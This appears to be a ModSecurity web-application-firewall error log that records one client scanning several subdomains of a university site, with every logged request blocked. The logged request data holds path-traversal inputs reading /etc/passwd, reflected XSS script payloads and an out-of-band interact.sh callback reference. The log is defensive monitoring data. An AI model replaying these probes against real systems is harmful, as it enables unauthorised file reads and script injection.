[Tue Aug 29 11:52:47.670696 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../..//../../ found within ARGS:dir: ../../..//../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15n8Co-f0AAAnjjUwAAAAX"]
[Tue Aug 29 11:52:47.684615 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../..//../../ found within ARGS:dir: ../../..//../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15n8Co-f0AAAoO54MAAAAK"]
[Tue Aug 29 11:52:47.688733 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:redirect_to: /asdf\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/demo/api/logout"] [unique_id "ZO15n8Co-f0AAAoVqpAAAAAH"]
[Tue Aug 29 11:52:47.692092 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/user/login/"] [unique_id "ZO15n8Co-f0AAAnjjU0AAAAX"]
[Tue Aug 29 11:52:47.702996 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../..//../../ found within ARGS:dir: ../../..//../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15n8Co-f0AAAoGFbUAAAAE"]
[Tue Aug 29 11:52:47.706981 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/user/login/"] [unique_id "ZO15n8Co-f0AAAoT7QMAAAAD"]
[Tue Aug 29 11:52:47.724164 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../..//../../ found within ARGS:dir: ../../..//../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15n8Co-f0AAAoGFbYAAAAE"]
[Tue Aug 29 11:52:48.534709 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../..//../../ found within ARGS:dir: ../../..//../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15oMCo-f0AAAoO54UAAAAK"]
[Tue Aug 29 11:52:48.543835 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/user/logout"] [unique_id "ZO15oMCo-f0AAAoW7I8AAAAJ"]
[Tue Aug 29 11:52:48.549270 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../..//../../ found within ARGS:dir: ../../..//../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15oMCo-f0AAAoXJq4AAAAP"]
[Tue Aug 29 11:52:48.632518 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/user/logout"] [unique_id "ZO15oMCo-f0AAAnjjVEAAAAX"]
[Tue Aug 29 11:52:48.702802 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/user/logout"] [unique_id "ZO15oMCo-f0AAAlUlw4AAAA0"]
[Tue Aug 29 11:52:48.812940 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/user/logout"] [unique_id "ZO15oMCo-f0AAAoLfLQAAAAG"]
[Tue Aug 29 11:52:48.816950 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/user/logout"] [unique_id "ZO15oMCo-f0AAAlUlxEAAAA0"]
[Tue Aug 29 11:52:49.545523 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:f: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/learn/cubemail/filemanagement.php"] [unique_id "ZO15ocCo-f0AAAoPuZcAAAAM"]
[Tue Aug 29 11:52:49.547104 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:f: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/learn/cubemail/filemanagement.php"] [unique_id "ZO15ocCo-f0AAAlUlxIAAAA0"]
[Tue Aug 29 11:52:49.548477 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:f: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/learn/cubemail/filemanagement.php"] [unique_id "ZO15ocCo-f0AAAoLfLUAAAAG"]
[Tue Aug 29 11:52:49.551144 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:m. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:m: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/anti-plagiarism/js.php"] [unique_id "ZO15ocCo-f0AAAoVqpkAAAAH"]
[Tue Aug 29 11:52:49.551876 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:m. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:m: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/anti-plagiarism/js.php"] [unique_id "ZO15ocCo-f0AAAnTlVkAAAAA"]
[Tue Aug 29 11:52:49.588104 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:f: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/learn/cubemail/filemanagement.php"] [unique_id "ZO15ocCo-f0AAAlUlxMAAAA0"]
[Tue Aug 29 11:52:49.589083 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:f: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/learn/cubemail/filemanagement.php"] [unique_id "ZO15ocCo-f0AAAoVqpoAAAAH"]
[Tue Aug 29 11:52:49.598793 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/user/register"] [unique_id "ZO15ocCo-f0AAAmQ-3cAAAAb"]
[Tue Aug 29 11:52:49.608972 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:u. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:u: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/tweb/ft.php"] [unique_id "ZO15ocCo-f0AAAoVqpsAAAAH"]
[Tue Aug 29 11:52:49.609563 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:u. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:u: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/tweb/ft.php"] [unique_id "ZO15ocCo-f0AAAoT7Q8AAAAD"]
[Tue Aug 29 11:52:49.613353 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:u. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:u: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/tweb/ft.php"] [unique_id "ZO15ocCo-f0AAAoLfLcAAAAG"]
[Tue Aug 29 11:52:49.621007 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:u. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:u: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tweb/ft.php"] [unique_id "ZO15ocCo-f0AAAfWOSIAAAAL"]
[Tue Aug 29 11:52:49.621221 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/user/register"] [unique_id "ZO15ocCo-f0AAAoW7JMAAAAJ"]
[Tue Aug 29 11:52:49.628081 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:m. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:m: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/anti-plagiarism/js.php"] [unique_id "ZO15ocCo-f0AAAoO548AAAAK"]
[Tue Aug 29 11:52:49.639566 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:m. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:m: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/anti-plagiarism/js.php"] [unique_id "ZO15ocCo-f0AAAoLfLgAAAAG"]
[Tue Aug 29 11:52:49.651727 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/user/register"] [unique_id "ZO15ocCo-f0AAAoO55AAAAAK"]
[Tue Aug 29 11:52:49.668631 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:u. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:u: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/tweb/ft.php"] [unique_id "ZO15ocCo-f0AAAnd3NEAAAAI"]
